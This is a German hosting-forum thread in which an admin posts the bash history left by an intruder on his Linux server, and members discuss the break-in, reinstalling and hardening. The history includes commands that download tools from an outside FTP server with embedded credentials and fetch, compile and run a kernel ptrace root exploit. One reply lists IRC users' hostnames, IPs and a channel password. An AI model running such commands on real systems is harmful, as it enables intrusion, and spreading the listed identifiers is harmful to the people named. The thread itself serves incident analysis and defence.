Server wurde gehackt *_*

[recoilmaster]

Blub !

Heute hats meine Kiste erwischt so wie ich es sehe sit er über nen Kernel Bug drauf gekommen.

Hier mal ein Auszug aus der .bash/history Hacker hat nicht aufgeraümt :)

Code: Select all

uname -a
cd /var/tmp
ls -al
mkdir ...
cd ...
dir
ftp 213.161.194.226 2400
chmod 777 *
./cy -d
dir
tar -xzf open*
cd open*
./configure
make
mkdir ../site
cd sta*/etc
rm ftpd.reg
wget ftp://root:r0xx0r@213.161.194.226:2400/ftpd.reg
../sbin/ftpd
cd ..
dir
cd log
dir
cat ftpd.err
netstat -an
cd ../etc
dir
rm ftpd.reg
wget ftp://root:r0xx0r@213.161.194.226:2400/ftpd.reg
../sbin/ftpd
/sbin/ifconfig
cd /proc
dir
cd net
dir
cat netlink
cat netstat
exit
dir
cd psy*
dir
cat psybnc.conf
cd /var/tmp/
dir
cd ...
dir
rm cy
rm ek*
cd open*
cd stan*/bin
dir
ftp 213.161.194.226 2400
tar -xzf poe-1*
cd poe*
cd POE*
perl Makefile.PL
make
cp -irf POE* ../
cd ..
tar -xzf poe-c*
cd POE-C*
perl Makefile.PL
make
dir
cp IRC.pm ../POE/Component/
cp Filter-IRC.pm ../POE/Filter/IRC.pm
cp Filter-CTCP.pm ../POE/Filter/CTCP.pm
cd ..
dir
ftp 213.161.194.226 2400
perl perlbot.pl
cd ../etc
cat default.cfg
cat sections.cfg
echo "">sections.cfg
cd sections
cp /var/tmp/.../site/*cfg ./
cd ../../bin
screen
ssh 62.141.54.185 -l test
exit
df
cd /var/tmp/...
dir
cd open*
cd stan*/etc/
cat sections.cfg
cd sections*
cat default.cfg
cd ../../sbin
./ftpd
cd ../bin
cat /var/tmp/.../pidfile
kill -9 28223
screen
../sbin/ftpd
cd /var/tmp/.../
dir
cat announce
cat pidfile
cat ann
/var/tmp/.../openftpd-0.29.4/standard/sbin/ftpd
exit
hostname -f
jah
uname -a
df
cd /
cd tmp
wget reve.dhs.org/kernelptrace.c
make kernelptrace
./kernelptrace 
rm kernelptrace
rm kernelptrace.c 
nano test.c
pico test.c
make test
./test 
rm test
rm test.c 

Oder liege ich da falsch ?

Reicht ein Kernelupdate oder soll ich die Kiste neu aufsetzen ?

Bye Keule

[sascha]

Reicht ein Kernelupdate oder soll ich die Kiste neu aufsetzen ?

Bitte sag mir dass die Frage nicht ernst gemeint ist.

[recoilmaster]

Ja ist ne dumme Frage ich weiss *_* hab aber sowas von 0 Bock die Kiste neu aufzusetzen, da steckt so viel Zeit drinnen

Scheiss Script Kiddys.

[r00ty]

vorher wicher dir nochmal die logs damit du nachschauen kannst wo sie reingekommen sind

[mutombo]

naja sonderlich clever sind die jungs nicht.

auf obigem ftp liegt ein perlscript für nen ftpbot, da steht server und pass der jungs drinne.

sind im efnet channel #stillhunted pass: 040404

kleine liste der user:

Code: Select all

#stillhunted _|p3rr0| H Jahwe@psybnc-user.gateway01.sHell1.de :4 _|p3rr0|
#stillhunted auzzi H ~auzzi@ati56.ati.ac.at :6 auzzi
#stillhunted anton52 H ~an@p5088E26E.dip0.t-ipconnect.de :3 anton52
#stillhunted beOND H KriZZ@pD956064D.dip.t-dialin.net :5 xxx
#stillhunted Indz|away H ~Indz@p50825CCB.dip.t-dialin.net :0 Indz
#stillhunted Zero_Cool H ~blabla@beh-ps.labs.pitt.edu :6 blabla
#stillhunted ACIID H ~lala@pD9FFF2C8.dip.t-dialin.net :0 ACIID
#stillhunted SiNUZ H ~123@beh-ps.labs.pitt.edu :5 321
#stillhunted |cartman- H ~netgear@h00508bf993b6.ne.client2.attbi.com :0 |cartman-
#stillhunted kichi H ~bitch@bliss.icemind.com :4 kichi
#stillhunted |Peach| H ~Peach@germol2-hosting.Kyiv.wnet.ua :4 |Peach|
#stillhunted bAsT|AWAY H dick@ns2.host-media.de :3 dick
#stillhunted SiL`- H SiL_@1337.vhost.at :3 SiL_
#stillhunted TU_GRAZ H ~AT-B0T@fstgal12.tu-graz.ac.at :0 GH
#stillhunted Koki|OFF H ~Koki@141.211.34.71 :4 Koki
#stillhunted deeflow H@ ~deeflow@in.meiner.jugend.bekam.ich.nur.Speed.und-cola.de :3 deeflow
#stillhunted mobber H@ ~mobber@ns3334.ovh.net :4 mobber
#stillhunted peer2k H muffin@chillt.im.garten-zum-traeumen.de :3 muffin
#stillhunted muhra|w H@ ~sexme@ns3334.ovh.net :4 sex
#stillhunted RaToR H tabaluga@kann.whois.lamer.nicht-leiden.de :3 Rator
#stillhunted RiMP^off H@ ~rimp@ns3334.ovh.net :5 rimp
#stillhunted Sky-Line- H@ Fox@tsg-ops.ath.cx :5 woops
#stillhunted ICET H+ rubby@frisst.kleine.kind3r.de :5 IceT

sind schon ein paar interessante ips dabei mit denen man recht einfach den realen besitzer zuordenen kann.

normalerweise hab ich ja nen gewissen respekt vor "hackern", aber das war ziemlich amateurhaft.

sieh mal zu das die einen auf den deckel bekommen :)

[captaincrunch]

da steckt so viel Zeit drinnen

Und dann hattest du nicht einmal die Zeit, einen halbwegs sicheren Kernel zu installieren? *kopfschüttel*

Mal ernsthaft: mach die Kiste platt und bügel Backups drüber, selbst wenn du es hier definitiv nicht mit "Hackern", sondern mit anfängerhaften Scriptkiddies zu tun hast.

[recoilmaster]

IP's gesammelt und Anzeige gegen unbekannt am Montag. Da wird sowieso nix draus, aber probieren kann manns *_*

[captaincrunch]

Der FTP mag leer sein, aber woher nimmst du die Sicherheit, dass nicht doch noch irgendwelchen "Hinterlassenschaften" da sind?

[thomas80]

Hallo,

hier kommt gleich mal die grosse böse noob-Frage: In der obig aufgelisteten bash hat der Angreifer doch schon root-Zugriff gehabt, oder nicht? Du sagtest ja, den hätte er über einen Kernel-exploit bekommen...muss man dazu eigentlich schon shell-Zugriff haben?? Und wie hat er den dann bekommen??

Gruß, Thomas

[recoilmaster]

das ganze lief unter Benutzer nicht root Rechte, für den Angriff hat er den User Test genutzt.

geflashed hat er den ganzen Stuff von seinem Server 62.141.54.185 62 GB MP3's genutzt wurde das Programm openftpd mit einigen Plugins, wie z.B IRC Abfrage aus Ihrem Channel, wie mutombo bereits schrieb

efnet channel #stillhunted pass: 040404


@CaptainCrunch laut bash history wurde nichts weiteres gemacht ausser openftpd installation und flashen, werde aber die Kiste neu installieren.

Hab deren FTP geflashed und auf CD gebrannt, die CD geht mit zur Anzeige.

Waren recht dumme Script Kiddies, da sie noch nicht mal Ihre Spuren verwischt haben.

Kernel Bug wurde nicht genutzt, sie haben ein pass generator prog auf Ihrem FTP, mein pw war mit drinnen :/ war leider auch recht simpel, von daher selber schuld.

Man lernt erst wenn man eine drauf bekommt.

[xyloid]

Kernel Bug wurde nicht genutzt, sie haben ein pass generator prog auf Ihrem FTP, mein pw war mit drinnen :/ war leider auch recht simpel, von daher selber schuld.

wie kann man auch bloß ein pw nehmen, das man womöglich noch in irgendeinem wörterbuch findet oder das sich von diesem "pass generator" ermitteln lässt.
wie du schon gesagt hast: da biste selbst schuld ;)

Nico

[Joe User]

Bleibt nur zu hoffen, dass Deine anderen 27 (Kunden)Server besser administriert werden...

[wgot]

... für den Angriff hat er den User Test genutzt.

ganz sicher der optimale Username für einen SSH-Account! :roll: :oops:

Gruß, Wolfgang

[recoilmaster]

Meine Meinung :lol:

Nie damit gerechnet und seid 1 Jahr nie was vorgefallen, von daher

[oxygen]

das ganze lief unter Benutzer nicht root Rechte, für den Angriff hat er den User Test genutzt.

Natürlich hatte er Rootrechte, was glaubst du was

wget reve.dhs.org/kernelptrace.c
make kernelptrace
./kernelptrace

macht...

Naja hättest du die Ratschläge hier im Forum befolgt wäre das nicht passiert. (/tmp, /var noexec,nosuid mounten, wget, w3m, lynx, gcc etc chmod 700 setzten oder ganz entfernen)

[recoilmaster]

Exploit für Kernel 2.20 ich weiss *_*

[compositiv]

IP's gesammelt und Anzeige gegen unbekannt am Montag. Da wird sowieso nix draus, aber probieren kann manns *_*

Vor allem wollen die Jungs den kompletten Rechner, dd-Image, Datenträger o.ä. reicht denen, zumindest in Hamburg, nicht.
Und wenn der Rechner nicht gemietet ist, sondern eine selbstangeschaffte "Hochleistungs"-maschine ist, wird da teilweise schon eine Menge Kapital unnötigerweise gebunden.

[Joe User]

Exploit für Kernel 2.20 ich weiss *_*

http://lwn.net/Vulnerabilities/25686/
http://www.web-hack.ru/exploit/exploit.php?go=1
http://www.zone-h.org/fr/forum/thread/f ... hread=4131

[silentfog]

Exploit für Kernel 2.20 ich weiss *_*

Du hast aber nicht zufällig u. a. die Domains megafoxes.de, europefashion.de etc. ?
Auf http://www.zone-h.org/en/defacements/fi ... domain=de/ kann man denn auch wieder einen 'tüchtigen' und 'verantwortungsvollen' Admin finden:

Code: Select all

r00t_System owns your Linux!!!
id
uid=0(root) gid=0(root)

uname -a
Linux p15137761 2.4.20 #1 SMP Sun Dec 1 21:25:43 CET 2002 i686 unknown

Kopfschüttel :?: Stef.

[recoilmaster]

nö sind nicht meine :)

Auf allen Kisten is nu neuster Kernel drauf + neue Passwörter + ssh2 *_* - sowas passiert mir nicht noch mal.

[silentfog]

nö sind nicht meine :)

Auf allen Kisten is nu neuster Kernel drauf + neue Passwörter + ssh2 *_* - sowas passiert mir nicht noch mal.

Hoffentlich
BTW. warum nicht gleich so :?:

[recoilmaster]

Hab gedacht das mir sowas nicht passiert 8O , wie gesagt erst muss was apssieren bevor manns lernt *_*

[arnee]

Besonders die 1&1 IP-Netze sind IMHO besonders gefährdet, weil die ganzen AutoExploit-Programme diese Netze wohl zuerst scannen, da sie dort wohl den quantitativ größten Erfolg haben dürften.

[silentfog]

Hab gedacht das mir sowas nicht passiert 8O , wie gesagt erst muss was apssieren bevor manns lernt *_*

:roll: Sorry folks - :? Aber da machen sich soviele Leute hier im Forum die größte Mühe und posten sich die Finger wund, opfern Ihre Freizeit, schauen auch über die eine oder ander "Unglaublichkeit" hinweg :!:

Natürlich auch aus Freude an der "Sache" selbst, aber es ist immer eine Art "Selbstlosigkeit" dabei ...

Und nun denke einmal darüber nach, Du hast ja immerin schon Beiträge: 253, was Deine Aussage eigentlich impliziert ... :( - Denkst Du nicht, daß sich manch einer dann fragt : "Warum poste ich eigentlich ..."

Eigentlich kann es jedem "relativ Wurst" sein, was Du mit Deinem Server machst - Du bist letztendlich verantwortlich ...

Aber "wurmen" tut es einen dann doch , sprich es gehen einem dann doch so Gedanken durch den Kopf, wie : " Sag' mal , spinn ich, lese ich da wirklich ... - gibt's doch nicht - steht doch g e n u g und a u s f ü h r l i c h im rootforum.

Aber sicher hast Du recht, "bevor man sich nicht die Finger verbrannt hat, kennt man die Bedeutung von HEISS nicht ...

:roll: Stef.

[konni]

Naja hättest du die Ratschläge hier im Forum befolgt wäre das nicht passiert. (/tmp, /var noexec,nosuid mounten, wget, w3m, lynx, gcc etc chmod 700 setzten oder ganz entfernen)

Für den Fall, dass ich mich jetzt lächerlich mache, aber ich bin so paranoid, und mach die "gefährlichen" Befehle immer auf 000, dann kann sie keiner ausführen, und wenn ich mal brauch kann man ja kurzzeitig umändern.